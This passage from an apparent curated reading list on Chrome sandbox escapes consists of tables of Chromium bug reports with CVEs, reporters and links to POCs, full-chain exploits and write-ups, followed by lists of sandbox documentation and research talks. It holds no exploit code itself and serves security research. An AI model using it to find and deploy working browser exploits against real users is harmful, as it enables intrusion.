 44 | [crbug-941746](https://crbug.com/941746) | Full Chain WriteUp | UAF in IndexedDBDatabase (Pwnium 2019) | CVE-2019-5826, M-73 | [Gengming Liu](https://crbug.com/?q=Gengming%20Liu%20OR%20l.dmxcsnsbh%40gmail.com&can=1) | [BlackhatUSA2019](https://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019.pdf), [POC2019](http://www.powerofcommunity.net/poc2019/Gengming.pdf)
 45 | [crbug-941008](https://crbug.com/941008) | MojoJS POC | UAF in FileChooserImpl | CVE-2019-5809, M-73, M-74, M-75 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1803](https://crbug.com/project-zero/1803)
 46 | [crbug-925864](https://crbug.com/925864) | MojoJS POC | UAF in FileSystemOperationRunner | CVE-2019-5788, M-73 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1767](https://crbug.com/project-zero/1767) 
 47 | [crbug-922677](https://crbug.com/922677) | Full Chain Exploit | UAF in FileWriterImpl | M-71 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [Full Chain Exploit](https://bugs.chromium.org/p/project-zero/issues/attachment?aid=388589&signed_aid=l6i6pjLBlXcNkkKWiDvd9A==), [p0-1755](https://crbug.com/project-zero/1755), [P0 Blog](https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html)
 48 | [crbug-921581](https://crbug.com/921581) | MojoJS POC | UAF in WebMIDI | CVE-2019-5789, M-73 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1754](https://crbug.com/project-zero/1754)
 49 | [crbug-916523](https://crbug.com/916523) | MojoJS POC | Double Free in StoragePartitionService | CVE-2019-5797, M-73 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1744](https://crbug.com/project-zero/1744)
 50 | [crbug-916080](https://crbug.com/916080) | MojoJS POC | UAF in P2PSocketDispatcherHost | M-71 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1743](https://crbug.com/project-zero/1743)
 51 | [crbug-912947](https://crbug.com/912947) | MojoJS POC | UAF in PaymentRequest | M-72 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1735](https://crbug.com/project-zero/1735)
 52 | [crbug-912520](https://crbug.com/912520) | MojoJS POC | UAF in MediaStream | M-72 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | [p0-1730](https://crbug.com/project-zero/1730)
 53 | [crbug-888926](https://crbug.com/888926) | Full Chain Exploit | UaF in Appcache (Hack2Win 2018) | CVE-2018-17462, M-69, M-70 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1), [Niklas Baumstark](https://twitter.com/_niklasb) | [POC2018](http://www.powerofcommunity.net/poc2018/ned.pdf), [35C3](https://www.youtube.com/watch?v=39yPeiY808w), [Github](https://github.com/niklasb/hack2win-chrome), [OffensiveCon2019](http://paper.vulsee.com/OffensiveCon2019/IPC%20You%20Outside%20the%20Sandbox%20-%20One%20bug%20to%20Rule%20the%20Chrome%20Broker/chrome_ipc_exploitation_offensivecon19.pdf)
 54 | [crbug-888366](https://crbug.com/888366) | HTML POC |  UAF in WebAudio | M-70, M-71, reward-5500 | [cdsrc2016](https://crbug.com/?q=reporter%3Acdsrc2016%40gmail.com&can=1) | -
 55 | [crbug-877182](https://crbug.com/877182) | Patch POC | OOB Read/Write in Mojo DataPipe deserialization | CVE-2018-16068, M-68 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | -
 56 | [crbug-842990](https://crbug.com/842990) | Patch POC | UAF in IndexedDB Connection | CVE-2018-6127, M-66, reward-10000 | [Looben Yang](https://crbug.com/?q=reporter%3Aloobenyang%40gmail.com&can=1) | -
 57 | [crbug-835887](https://crbug.com/835887) | Full Chain Exploit | Logic Bug in "filesystem:" Scheme URL, PDF Plugin, Extension, WebUI  | M-67, M-68, reward-40633.7 | [Sergey Glazunov](https://crbug.com/?q=reporter%3Aserg.glazunov%40gmail.com%2Cglazunov%40google.com%20OR%20reward_to-glazunov_at_google.com&can=1) | [crbug-836362](https://crbug.com/836362), [crbug-836859](https://crbug.com/836859), [crbug-836858](https://crbug.com/836858), [crbug-840857](https://crbug.com/840857)
 58 | [crbug-831963](https://crbug.com/831963) | Patch POC | UAF in In-memory Cache 2 | CVE-2018-6118, M-66, M-67, M-68, reward-10500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | - 
 59 | [crbug-827492](https://crbug.com/827492) | Patch POC | UAF in In-memory Cache | CVE-2018-6086, M-66, reward-10500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 60 | [crbug-826626](https://crbug.com/826626) | Patch POC | UAF in Blockfile Media Cache | CVE-2018-6085, M-66, reward-10000 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 61 | [crbug-794969](https://crbug.com/794969) | Patch POC | OOB Read in deserializing Mojo "Event" messages | M-65 | [Gal Beniamini](https://crbug.com/?q=reporter%3Alaginimaineb%40google.com&can=1) | -
 62 | [crbug-791003](https://crbug.com/791003) | Patch POC | Logic Bug in "catalog" service | CVE-2018-6055, M-65 | [Gal Beniamini](https://crbug.com/?q=reporter%3Alaginimaineb%40google.com&can=1) | -
 63 | [crbug-780708](https://crbug.com/780708) | WriteUp | Logic Bug in Android “googlechrome:” Scheme URL (Mobile Pwn2Own 2017) | M-65 | ? | -
 64 | [crbug-779314](https://crbug.com/779314) | Patch POC |  OOB Read in Blob | CVE-2017-15416, M-65, reward-2500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 65 | [crbug-778505](https://crbug.com/778505) | Patch POC | OOB Write in QUIC | CVE-2017-15407, M-65, reward-10500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 66 | [crbug-777728](https://crbug.com/777728) | Patch POC | Stack Overflow in QUIC | CVE-2017-15398, M-76, reward-10500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 67 | [crbug-728887](https://crbug.com/728887) | Patch POC | UAF in IndexedDB OpenCursor | CVE-2017-5091, M-60, reward-10000 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | -
 68 | [crbug-725032](https://crbug.com/725032) | Patch POC | UAF in IndexedDB Transactions | CVE-2017-5087, M-58, M-60, M-61, reward-10500 | [Ned Williamson](https://crbug.com/?q=reporter%3Anedwilliamson%40gmail.com&can=1) | - 
 69 | [crbug-698622](https://crbug.com/698622) | HTML POC | UAF in Printing | CVE-2017-5055, M-57, M-58, reward-9337 | [Wadih Matar](https://crbug.com/?q=reporter%3Awadih.matar%40gmail.com&can=1) | - 
 70 | [crbug-664551](https://crbug.com/664551) | Full Chain Exploit | Logic Bug in Android Play Store (PWNFest 2016) | M-55 | [Guang Gong](https://crbug.com/?q=Guang%20Gong%20OR%20reporter%3Ahigongguang%40gmail.com&can=1) | [Github](https://github.com/secmob/pwnfest2016)
 71 | [crbug-659489](https://crbug.com/659489) | Full Chain WriteUp | Logic Bug in Android "content:" Scheme URL, File Download (Mobile Pwn2Own 2016) | M-54 | Robert Miller, Georgi Geshev | [crbug-659492](https://crbug.com/659492), [WriteUp](https://bugs.chromium.org/p/chromium/issues/attachment?aid=256529&signed_aid=SVqnSnUXkCxCd2kvi4taPQ==)
 72 | [crbug-659474](https://crbug.com/659474) | Full Chain WriteUp | Logic Bug in Android "intent:" Scheme URL, IPC (Mobile Pwn2Own 2016) | M-54 | Qidan He, [Gengming Liu](https://crbug.com/?q=Gengming%20Liu%20OR%20l.dmxcsnsbh%40gmail.com&can=1) | [crbug-659477](https://crbug.com/659477), [WriteUp](https://bugs.chromium.org/p/chromium/issues/attachment?aid=256510&signed_aid=aCap7zbHUwwvY27EqLSDQw==), [CSW2017](https://cansecwest.com/slides/2017/CSW2017_QidanHe-GengmingLiu_Pwning_Nexus_of_Every_Pixel.pdf) 
 73 | [crbug-610600](https://crbug.com/610600) | Frida Exploit | Logic Bug in PPAPI/Flash Broker | CVE-2016-1706, M-52, reward-15000 | [Pinkie Pie](https://crbug.com/?q=Pinkie%20Pie%20OR%20reporter%3A70696e6b6965706965%40gmail.com&can=1) | -
 74 | [crbug-595834](https://crbug.com/595834) | Full Chain Exploit | Logic Bug in GPU, WebUI, SmartScreen (Pwn2Own 2016) | - | [JungHoon Lee](https://crbug.com/?q=reporter%3Alkhz49%40gmail.com,lokihardt%40google.com&can=1) | [crbug-595844](https://crbug.com/595844), [crbug-596862](https://crbug.com/596862), [WriteUp](https://bugs.chromium.org/p/chromium/issues/attachment?aid=227798&signed_aid=BJUc8JNFcIyk7erbvIE1EQ==)
 75 | [crbug-590284](https://crbug.com/590284) | Patch POC | UAF in RenderWidgetHostImpl | CVE-2016-1647, M-49, M-50, reward-10500 | [gzobqq](https://crbug.com/?q=reporter%3Agzobqq%40gmail.com&can=1) | - 
 76 | [crbug-564501](https://crbug.com/564501) | Patch POC | UAF in MidiHost | M-48 | [Oliver Chang](https://crbug.com/?q=reporter%3Aochang%40chromium.org%2Cochang%40google.com&can=1) | -  
 77 | [crbug-558589](https://crbug.com/558589) | Webserver POC | UAF in AppCacheUpdateJob | CVE-2015-6765, M-47, M-48, reward-10000 | [gzobqq](https://crbug.com/?q=reporter%3Agzobqq%40gmail.com&can=1) | -
 78 | [crbug-554946](https://crbug.com/554946) | Full Chain WriteUp | Logic Bug in Android Play Store (Mobile Pwn2Own 2015) | CVE-2015-6764, M-47, reward-7500 | [Guang Gong](https://crbug.com/?q=Guang%20Gong%20OR%20reporter%3Ahigongguang%40gmail.com&can=1) | [crbug-554518](https://crbug.com/554518), [Github](https://github.com/secmob/cansecwest2016)
 79 | [crbug-554908](https://crbug.com/554908) | Patch, Webserver POC | UAF in AppCacheDispatcherHost | CVE-2015-6767, M-47, M-48, reward-10000 | [gzobqq](https://crbug.com/?q=reporter%3Agzobqq%40gmail.com&can=1) | -
 80 | [crbug-551044](https://crbug.com/551044) | Patch, Webserver POC | Memory Corruption in AppCacheUpdateJob | CVE-2015-6766, M-47, M-48, reward-11337 | [gzobqq](https://crbug.com/?q=reporter%3Agzobqq%40gmail.com&can=1) | -
 81 | [crbug-484270](https://crbug.com/484270) | Webserver POC | Heap Overflow in CertificateResourceHandler | M-43 | [Mark Brand](https://crbug.com/?q=reporter%3Amarkbrand%40google.com&can=1) | -
 82 | [crbug-416449](https://crbug.com/416449) | Full Chain Exploit | OOB Write in P2PHostMsg_Send IPC | CVE-2014-3188, M-38, reward-27634 | [Jüri Aedla](https://crbug.com/?q=reporter%3Aaedla%40chromium.org&can=1) | [crbug-416528](https://crbug.com/416528), [WriteUp](https://bugs.chromium.org/p/chromium/issues/attachment?aid=63680&signed_aid=Mz6eypMLGiZqfxRiO-8Agw==)
 83 | [crbug-386988](https://crbug.com/386988) | Full Chain Exploit | Logic Bugs in Extension and WebUI | reward-30000 | [JungHoon Lee](https://crbug.com/?q=reporter%3Alkhz49%40gmail.com,lokihardt%40google.com&can=1) | [crbug-367567](https://crbug.com/367567), [crbug-387033](https://crbug.com/387033), [crbug-387037](https://crbug.com/387037), [crbug-50275](https://crbug.com/50275)
 84 | [crbug-352369](https://crbug.com/352369) | Full Chain Exploit | Memory Corruption in Clipboard IPC (Pwn2Own 2014) | M-33 | [VUPEN](https://crbug.com/?q=VUPEN&can=1) | [crbug-352395](https://crbug.com/352395), [Google Presentation](https://docs.google.com/presentation/d/1c90yZXNHs7w8oi7uXveEOCx5-8O_NZIxolEKalscuAQ)
 85 | [crbug-319117](https://crbug.com/319117) | Full Chain Exploit | Memory Corruption in Clipboard IPC (Mobile Pwn2Own 2013) | CVE-2013-6632, M-31, M-32 | [Pinkie Pie](https://crbug.com/?q=Pinkie%20Pie%20OR%20reporter%3A70696e6b6965706965%40gmail.com&can=1) | [crbug-319125](https://crbug.com/319125), [WriteUp](https://docs.google.com/document/d/1tHElG04AJR5OR2Ex-m_Jsmc8S5fAbRB3s4RmTG_PFnw/edit)
 86 | 
 87 | * It only includes Chrome Browser own Bugs like IPC(Mojo), WebAPI, WebUI, Extension.. (Not included using Kernel Bugs like [MWRLab's Pwn2own 2013 Exploit](https://labs.mwrinfosecurity.com/assets/BlogFiles/MWR-PolishingChrome-NSC-slides.pdf), [lokihardt's Pwn2Own 2015 Exploit](https://crbug.com/468933))  
 88 | * It only includes Security Bugs that published POC/Exploit from [crbug.com](https://crbug.com).  
 89 | * It was searched by hands, so there may be something missing.  
 90 | 
 91 | 
 92 | ## Permission Denied Issues  
 93 | 
 94 | Issue Number | Chromium Review | Summary | Reporter 
 95 | -- | -- | -- | -- 
 96 | [crbug-1073015](https://crbug.com/1073015) | [bug:1073015](https://chromium-review.googlesource.com/q/bug:1073015) | [[83.0.4103.61](https://chromereleases.googleblog.com/2020/05/stable-channel-update-for-desktop_19.html)][$20000] High CVE-2020-6465: Use after free in reader mode | Woojin Oh (@pwn_expoit)
 97 | [crbug-1074706](https://crbug.com/1074706) | [bug:1074706](https://chromium-review.googlesource.com/q/bug:1074706) | [[83.0.4103.61](https://chromereleases.googleblog.com/2020/05/stable-channel-update-for-desktop_19.html)][$15000] High CVE-2020-6466: Use after free in media | Zhe Jin
 98 | [crbug-1064891](https://crbug.com/1064891) | [bug:1064891](https://chromium-review.googlesource.com/q/bug:1064891) | [[81.0.4044.129](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_27.html)][$10000] High CVE-2020-6462: Use after free in task scheduling | Zhe Jin
 99 | [crbug-1072983](https://crbug.com/1072983) | [bug:1072983](https://chromium-review.googlesource.com/q/bug:1072983) | [[81.0.4044.129](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_27.html)][$TBD] High CVE-2020-6461: Use after free in storage | Zhe Jin
100 | [crbug-1065298](https://crbug.com/1065298) | [bug:1065298](https://chromium-review.googlesource.com/q/bug:1065298) | [[81.0.4044.122](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_21.html)][$20000] High CVE-2020-6459: Use after free in payments | Zhe Jin 
101 | [crbug-1063566](https://crbug.com/1063566) | [bug:1063566](https://chromium-review.googlesource.com/q/bug:1063566) | [[81.0.4044.122](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_21.html)][$15000] High CVE-2020-6460: Insufficient data validation in URL formatting | Anonymous 
102 | [crbug-1067851](https://crbug.com/1067851) | [bug:1067851](https://chromium-review.googlesource.com/q/bug:1067851) | [[81.0.4044.113](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_15.html)][$TBD] Critical CVE-2020-6457: Use after free in speech recognizer | Leecraso, Guang Gong
103 | [crbug-1019161](https://crbug.com/1019161) | [bug:1019161](https://chromium-review.googlesource.com/q/bug:1019161) | [[81.0.4044.92](https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_7.html)][$7500] High CVE-2020-6454: Use after free in extensions | Leecraso, Guang Gong
104 | [crbug-1059349](https://crbug.com/1059349) | [bug:1059349](https://chromium-review.googlesource.com/q/bug:1059349) | [[80.0.3987.149](https://chromereleases.googleblog.com/2020/03/stable-channel-update-for-desktop_18.html)][$N/A] High CVE-2019-20503: Out of bounds read in usersctplib | Natalie Silvanovich
105 | [crbug-999311](https://crbug.com/999311) | [bug:999311](https://chromium-review.googlesource.com/q/bug:999311) | [[77.0.3865.75](http://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html)][$30000] Critical CVE-2019-5870: Use-after-free in media | Guang Gong
106 | [crbug-989797](https://crbug.com/989797) | [bug:989797](https://chromium-review.googlesource.com/q/bug:989797) | [[77.0.3865.75](http://chromereleases.googleblog.com/2019/09/stable-channel-update-for-desktop.html)][$3000] High CVE-2019-5874: External URIs may trigger other browsers | James Lee
107 | [crbug-959438](https://crbug.com/959438) | [bug:959438](https://chromium-review.googlesource.com/q/bug:959438) | [[76.0.3809.87](http://chromereleases.googleblog.com/2019/07/stable-channel-update-for-desktop_30.html)][$TBD] High CVE-2019-5859: Some URIs can load alternative browsers | James Lee
108 | 
109 | * It only includes Permission Denied Issues posted on [Chrome Releases Blog](https://chromereleases.googleblog.com/) (Latest 3 years).
110 | * It was searched by hands, so there may be something missing, too.  
111 | 
112 | ## Chrome Sandbox Internals
113 | * [Stanford seclab - The Security Architecture of the Chromium Browser (2008)](https://seclab.stanford.edu/websec/chromium/chromium-security-architecture.pdf), [PPT](https://pdfs.semanticscholar.org/8a02/1c9c69effbdd159838ac5204d9da4e996f86.pdf)
114 | * [Chromium Docs - Sandbox](https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md)
115 | * [Chromium Docs - Sandbox FAQ](https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox_faq.md)
116 | * [Chromium Docs - WebUI Explainer](https://chromium.googlesource.com/chromium/src/+/master/docs/webui_explainer.md)
117 | * [Chromium Docs - Mojo](https://chromium.googlesource.com/chromium/src/+/master/mojo/README.md)
118 | * [Chromium Docs - Intro to Mojo & Services](https://chromium.googlesource.com/chromium/src/+/master/docs/mojo_and_services.md)
119 | * [Chromium Docs - Mojo Basics](https://chromium.googlesource.com/chromium/src/+/master/mojo/docs/basics.md)
120 | * [Chromium Docs - Mojo IDL](https://chromium.googlesource.com/chromium/src/+/master/mojo/public/tools/bindings/README.md)
121 | * [Chromium Docs - Mojo C System API](https://chromium.googlesource.com/chromium/src/+/master/mojo/public/c/system/README.md)
122 | * [Chromium Docs - Mojo C++ Bindings API](https://chromium.googlesource.com/chromium/src/+/master/mojo/public/cpp/bindings/README.md)
123 | * [Chromium Docs - Mojo JavaScript Bindings API](https://chromium.googlesource.com/chromium/src/+/master/mojo/public/js/README.md)
124 | * [Chromium Docs - Mojo “Style” Guide](https://chromium.googlesource.com/chromium/src/+/master/docs/security/mojo.md)
125 | * [Chromium Docs - Converting Legacy IPC to Mojo](https://chromium.googlesource.com/chromium/src/+/master/docs/mojo_ipc_conversion.md)
126 | * [Chromium Docs - The Service Manager & Services](https://chromium.googlesource.com/chromium/src/+/master/services/service_manager/README.md)
127 | * [Chromium Docs - Service Development Guidelines](https://chromium.googlesource.com/chromium/src/+/master/services/README.md)
128 | * [Chromium Docs - Servicifying Chromium Features](https://chromium.googlesource.com/chromium/src/+/master/docs/servicification.md)
129 | * [Google Docs - Chrome Service Model](https://docs.google.com/document/d/15I7sQyQo6zsqXVNAlVd520tdGaS8FCicZHrN0yRu-oU)
130 | * [Google Docs - Mojo Tutorial](https://docs.google.com/document/d/1mufrtxTk8w9qa3jcnlgqsYkWlyhwEpc7aWNaSOks7ug)
131 | * [Google Docs - Blob Servicification](https://docs.google.com/document/d/1_ROmusFvd8ATwIZa29-P6Ls5yyLjfld0KvKchVfA84Y)
132 | * [Google Docs - Device Service in Chromium](https://docs.google.com/document/d/1k0caAXgSchvXzkzwZYxudZRNpwtFWUkgvQInlw-fKuY)
133 | * [Google Docs - Device Service: Technical Approach](https://docs.google.com/document/d/1_1Vt4ShJCiM3fin-leaZx00-FoIPisOr8kwAKsg-Des)
134 | * [Google Docs - Device Service: Extraction from the Content Layer](https://docs.google.com/document/d/1UVFBfz8XajKwFYUtcjvPTOp4gEFRgCZ_hqz_gDO8LBo/edit#heading=h.z3q403opm2na)
135 | * [Google Docs - Identity Service in Chromium](https://docs.google.com/document/d/1hVZDURLaL6ZwzEw8kYwzCqA8EpJmCIf0ItU7voMfTWg/)
136 | * [Google Docs - Identity Service: Technical Approach](https://docs.google.com/document/d/1EPLEJTZewjiShBemNP5Zyk3b_9sgdbrZlXn7j1fubW0)
137 | * [Google Docs - Serving the Identity Extension API via the Identity Service](https://docs.google.com/document/d/1XUNE30A-aEyg1_Sbe6kFiDCWKXnz5s5vQDsd6ymIb-0)
138 | * [Google Docs - Network Service in Chrome](https://docs.google.com/document/d/1wAHLw9h7gGuqJNCgG1mP1BmLtCGfZ2pys-PdZQ1vg7M)
139 | * [Google Docs - Network Service Conversion Cheat Sheet](https://docs.google.com/document/d/1OyBYvN0dwvpqfSZBdsfZ29iTFqGnVS2sdiPV14Z-Fto)
140 | * [Google Docs - Error Handling in Network Service](https://docs.google.com/document/d/1CZMPzQrmGvjz3O7RC-MR56fStLJj1RjdKNkFItzJs0Y)
141 | * [Google Docs - Restartable Network Service](https://docs.google.com/document/d/14dQpOaPgnpX0TZffSGeYyE-dUS93HY06VKGWUGZHtrY/)
142 | * [Google Docs - Notes on Mojo-ifying Safe Browsing's URL Check](https://docs.google.com/document/d/1H5_0CUVvX_R34RwuTt_iUun-px7QMnLQh8toEWcwCQk)
143 | * [Google Docs - Per-Profile Mojo Services](https://docs.google.com/document/d/1Fj013SXClTzk4Yfq2eoL9OkKfN0h-GLXPAokCXFkcTY)
144 | * [Google Docs - Pref Service](https://docs.google.com/document/d/1JU8QUWxMEXWMqgkvFUumKSxr7Z-nfq0YvreSJTkMVmU)
145 | * [Google Drawing - Chrome Security Architecture](https://docs.google.com/drawings/d/1TuECFL9K7J5q5UePJLC-YH3satvb1RrjLRH-tW_VKeE)
146 | * [Google PDF - bpf_dsl: A domain-specific language for seccomp-bpf policies](https://drive.google.com/file/d/0B9LSc_-kpOQPVHhvcVBza3NWR0k)
147 | * [The Chromium Projects - OSX Sandboxing Design](http://dev.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design)
148 | * [The Chromium Projects - Security Tips for IPC](https://www.chromium.org/Home/chromium-security/education/security-tips-for-ipc)
149 | * [hidd3ncod3s blog - Chrome IPC Internals](https://hiddencodes.wordpress.com/2012/08/07/chrome-ipc-internals-part-i/)
150 | 
151 | ## Awesome Chrome Sandbox Escape
152 | * [Theori Blog (2020) - Cleanly Escaping the Chrome Sandbox](https://theori.io/research/escaping-chrome-sandbox/)
153 | * [Project Zero Blog (2020) - You Won't Believe what this One Line Change Did to the Chrome Sandbox](https://googleprojectzero.blogspot.com/2020/04/you-wont-believe-what-this-one-line.html)
154 | * [REDTEAM.PL Blog (2020) - Google Chrome display locking fuzzing](https://blog.redteam.pl/2020/04/google-chrome-display-locking-fuzzing.html)
155 | * [Blue Forest Security (2020) - Exploiting CVE-2020-0041 - Part 1: Escaping the Chrome Sandbox](https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/)
156 | * [Blue Forest Security (2020) - Exploiting CVE-2020-0041 - Part 2: Escalating to root](https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/)
157 | * [Project Zero Blog (2020) - Escaping the Chrome Sandbox with RIDL](https://googleprojectzero.blogspot.com/2020/02/escaping-chrome-sandbox-with-ridl.html)
158 | * [Project Zero Blog (2020) - A day^W^W Several months in the life of Project Zero - Part 1: The Chrome bug of suffering](https://googleprojectzero.blogspot.com/2020/02/several-months-in-life-of-part1.html)
159 | * [Project Zero Blog (2020) - A day^W^W Several months in the life of Project Zero - Part 2: The Chrome exploit of suffering](https://googleprojectzero.blogspot.com/2020/02/several-months-in-life-of-part2.html)
160 | * [REDTEAM.PL Blog (2019) - Google Chrome portal element fuzzing](https://blog.redteam.pl/2019/12/chrome-portal-element-fuzzing.html)
161 | * [KEEN Team (POC 2019) - Chrome Exploitation](http://www.powerofcommunity.net/poc2019/Gengming.pdf)
162 | * [Abdulrahman Al-Qabandi Blog (2019) - Microsoft Edge (Chromium): EoP via XSS to Potential RCE](https://leucosite.com/Edge-Chromium-EoP-RCE/)
163 | * [Blue Forest Security (2019) - Escaping the Chrome Sandbox via an IndexedDB Race Condition](https://labs.bluefrostsecurity.de/blog/2019/08/08/escaping-the-chrome-sandbox-via-an-indexeddb-race-condition/) 
164 | * [KEEN Team (Blackhat USA 2019) - The Most Secure Browser? Pwning Chrome from 2016 to 2019](https://i.blackhat.com/USA-19/Wednesday/us-19-Feng-The-Most-Secure-Browser-Pwning-Chrome-From-2016-To-2019.pdf)
165 | * [Exodus Intelligence (2019) - WINDOWS WITHIN WINDOWS: ESCAPING THE CHROME SANDBOX WITH A WIN32K NDAY](https://blog.exodusintel.com/2019/05/17/windows-within-windows/)
166 | * [Project Zero Blog (2019) - Virtually Unlimited Memory: Escaping the Chrome Sandbox](https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html)
167 | * [Tencent Xuanwu Lab (Blackhat Asia 2019) - Attacking Browser Sandbox: Live Persistently and Prosperously](https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Ma-Attacking-Browser-Sandbox.pdf)
168 | * [Flanker Sky (2019) - Galaxy Leapfrogging: Pwning the Galaxy S8](https://blog.flanker017.me/galaxy-leapfrogging-pwning-the-galaxy-s8/)
169 | * [WCTF 2019 - Mojojojo](https://drive.google.com/drive/u/0/folders/1xijouA9fj1YUrY97wyoEQCZ5Q3tRWNOq)  
170 | * [Eternal Stories (2019) - Google CTF 2019 monochromatic writeup](http://eternal.red/2019/monochromatic-writeup/)
171 | * [Niklas Baumstark (OffensiveCon 2019) - IPC you outside the sandbox: One bug to rule the Chrome broker](http://paper.vulsee.com/OffensiveCon2019/IPC%20You%20Outside%20the%20Sandbox%20-%20One%20bug%20to%20Rule%20the%20Chrome%20Broker/chrome_ipc_exploitation_offensivecon19.pdf)
172 | * [Ned Williamson (POC 2018) - Exploiting Chrome IPC
173 | ](http://www.powerofcommunity.net/poc2018/ned.pdf)
174 | * [Google CTF 2018 - pwn-mojo](https://github.com/google/google-ctf/tree/master/2018/finals/pwn-mojo)  
175 | * [360 Alpha Team (CanSecWest 2018) - Attacks and analysis of the Samsung S8 from Mobile PWN2OWN](https://cansecwest.com/slides/2018/Attacks%20and%20Analysis%20of%20the%20Samsung%20S8%20from%20Mobile%20PWN2OWN%20-%20Guang%20Gong%20and%20Jianjun%20Dai,%20Qihoo%20360.pdf)
176 | * [Microsoft Blog (2017) - Browser security beyond sandboxing](https://www.microsoft.com/security/blog/2017/10/18/browser-security-beyond-sandboxing/?source=mmpc)
177 | * [X41 (2017) - Browser Security White Paper](https://paper.seebug.org/papers/Archive/X41-Browser-Security-White-Paper.pdf)
178 | * [Guang Gong (Syscan 2017) - Butterfly Effect and Program Mistake](https://github.com/secmob/pwnfest2016/blob/master/Butterfly%20Effect%20and%20Program%20Mistake(SyScan2107).pdf)
179 | * [KEEN Team (CanSecWest 2017) - Pwning the Nexus of Every Pixel](https://cansecwest.com/slides/2017/CSW2017_QidanHe-GengmingLiu_Pwning_Nexus_of_Every_Pixel.pdf)
180 | * [KEEN Team (DEFCON24 2016) - Escaping The Sandbox By Not Breaking It](https://papers.put.as/papers/macosx/2016/sandbox_defcon.pdf)
181 | * [Guang Gong (CanSecWest 2016) - Pwn a Nexus device with a single vulnerability](https://github.com/secmob/cansecwest2016/blob/master/Pwn%20a%20Nexus%20device%20with%20a%20single%20vulnerability.pdf)
182 | * [James Forshaw (Troopers 2016) - The Joy of Sandbox Mitigations](https://www.troopers.de/media/filer_public/f6/07/f6076037-85e0-42b7-9a51-507986edafce/the_joy_of_sandbox_mitigations_export.pdf)
183 | * [James Forshaw (Nullcon 2015) - The Windows Sandbox Paradox](https://nullcon.net/website/archives/ppt/goa-15/the-windows-sandbox-paradox.pdf)
184 | * [Guang Gong (BlackHat USA 2015) - Fuzzing Android System Services by Binder Call to Escalate Privilege](https://www.blackhat.com/docs/us-15/materials/us-15-Gong-Fuzzing-Android-System-Services-By-Binder-Call-To-Escalate-Privilege.pdf)
185 | * [Chrome Security Team (2014) - Pwnium 4, Pwn2Own 2014: Make it rain](https://docs.google.com/presentation/d/1c90yZXNHs7w8oi7uXveEOCx5-8O_NZIxolEKalscuAQ/edit#slide=id.g36e7e5d9b_00)
186 | * [Chromium Blog (2012) - A Tale of Two Pwnies (Part 1)](https://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)  
187 | * [Chromium Blog (2012) - A Tale Of Two Pwnies (Part 2)](https://blog.chromium.org/2012/06/tale-of-two-pwnies-part-2.html)  
188 | 


--------------------------------------------------------------------------------